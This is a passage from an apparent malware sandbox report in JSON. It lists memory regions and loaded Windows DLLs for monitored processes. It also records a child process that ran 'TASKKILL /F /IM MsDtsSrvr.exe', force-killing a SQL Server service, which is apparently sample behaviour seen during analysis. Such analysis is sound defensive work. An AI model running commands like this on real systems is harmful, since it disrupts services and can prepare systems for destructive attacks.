is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 1245184, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_3206", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 1245184, "timestamp": "00:01:26.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_3207", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:26.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_3208", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:26.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_3209", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:26.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5836799, "entry_point": 0, "filename": null, "id": "region_3210", "name": "pagefile_0x0000000000410000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4259840, "timestamp": "00:01:26.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 7798783, "entry_point": 7012352, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_3211", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 7012352, "timestamp": "00:01:26.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 8519679, "entry_point": 0, "filename": null, "id": "region_3212", "name": "private_0x00000000007e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8257536, "timestamp": "00:01:26.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9961472, "type": "region", "version": 1 }, "end_va": 10223615, "entry_point": 0, "filename": null, "id": "region_3213", "name": "private_0x0000000000980000", "norm_filename": null, "region_type": "private_memory", "start_va": 9961472, "timestamp": "00:01:26.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10289152, "type": "region", "version": 1 }, "end_va": 10551295, "entry_point": 0, "filename": null, "id": "region_3214", "name": "private_0x00000000009d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10289152, "timestamp": "00:01:26.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 14876672, "type": "region", "version": 1 }, "end_va": 35848191, "entry_point": 0, "filename": null, "id": "region_3215", "name": "pagefile_0x0000000000e30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14876672, "timestamp": "00:01:26.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_3216", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:26.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3217", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:26.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_3218", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:26.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1787112264, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_3219", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:26.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787368602, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_3220", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:26.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 10551296, "type": "region", "version": 1 }, "end_va": 11599871, "entry_point": 0, "filename": null, "id": "region_3221", "name": "private_0x0000000000a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 10551296, "timestamp": "00:01:26.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12124160, "type": "region", "version": 1 }, "end_va": 12386303, "entry_point": 0, "filename": null, "id": "region_3222", "name": "private_0x0000000000b90000", "norm_filename": null, "region_type": "private_memory", "start_va": 12124160, "timestamp": "00:01:26.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786800921, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_3223", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:26.651", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11665408, "type": "region", "version": 1 }, "end_va": 11927551, "entry_point": 0, "filename": null, "id": "region_3224", "name": "private_0x0000000000b20000", "norm_filename": null, "region_type": "private_memory", "start_va": 11665408, "timestamp": "00:01:26.663", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12386304, "type": "region", "version": 1 }, "end_va": 12648447, "entry_point": 0, "filename": null, "id": "region_3225", "name": "private_0x0000000000bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 12386304, "timestamp": "00:01:26.663", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35848192, "type": "region", "version": 1 }, "end_va": 38793215, "entry_point": 35848192, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3226", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35848192, "timestamp": "00:01:26.663", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3227", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:26.663", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3228", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:26.664", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_3229", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:26.664", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_3230", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:26.666", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9043968, "type": "region", "version": 1 }, "end_va": 9306111, "entry_point": 0, "filename": null, "id": "region_3231", "name": "private_0x00000000008a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9043968, "timestamp": "00:01:26.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12976128, "type": "region", "version": 1 }, "end_va": 13238271, "entry_point": 0, "filename": null, "id": "region_3232", "name": "private_0x0000000000c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 12976128, "timestamp": "00:01:26.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 13697024, "type": "region", "version": 1 }, "end_va": 13959167, "entry_point": 0, "filename": null, "id": "region_3233", "name": "private_0x0000000000d10000", "norm_filename": null, "region_type": "private_memory", "start_va": 13697024, "timestamp": "00:01:26.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 14155776, "type": "region", "version": 1 }, "end_va": 14417919, "entry_point": 0, "filename": null, "id": "region_3234", "name": "private_0x0000000000d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 14155776, "timestamp": "00:01:26.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1786707968, "type": "region", "version": 1 }, "end_va": 1786769407, "entry_point": 1786716576, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_3235", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1786707968, "timestamp": "00:01:26.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3236", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:26.726", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3237", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:26.726", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1782906880, "type": "region", "version": 1 }, "end_va": 1783521279, "entry_point": 1783036089, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_3238", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1782906880, "timestamp": "00:01:26.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1786576896, "type": "region", "version": 1 }, "end_va": 1786675199, "entry_point": 1786581813, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_3239", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1786576896, "timestamp": "00:01:26.733", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM MsDtsSrvr.exe /IM MsDtsSrvr.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_25", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 25, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3240", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:26.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3241", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:26.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3242", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:26.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_3243", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:26.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_3244", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:26.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_3245", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:26.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1703935, "entry_point": 0, "filename": null, "id": "region_3246", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:01:26.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 12779520, "type": "region", "version": 1 }, "end_va": 12869631, "entry_point": 12803209, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_3247", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 12779520, "timestamp": "00:01:26.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3248", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:26.981", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3249", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:26.981", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3250", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:26.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3251", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:26.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3252", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:26.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3253", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:26.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3254", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:26.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3255", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:26.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3256", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:26.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 0, "filename": null, "id": "region_3257", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:26.987", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3258", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:26.987", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3259", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:26.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3260", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:26.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_3261", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:26.989", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_3262", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:26.989", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3263", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:27.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3264", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:27.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 2125823, "entry_point": 1703936, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3265", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1703936, "timestamp": "00:01:27.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 5111807, "entry_point": 0, "filename": null, "id": "region_3266", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:01:27.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 6946816, "type": "region", "version": 1 }, "end_va": 7012351, "entry_point": 0, "filename": null, "id": 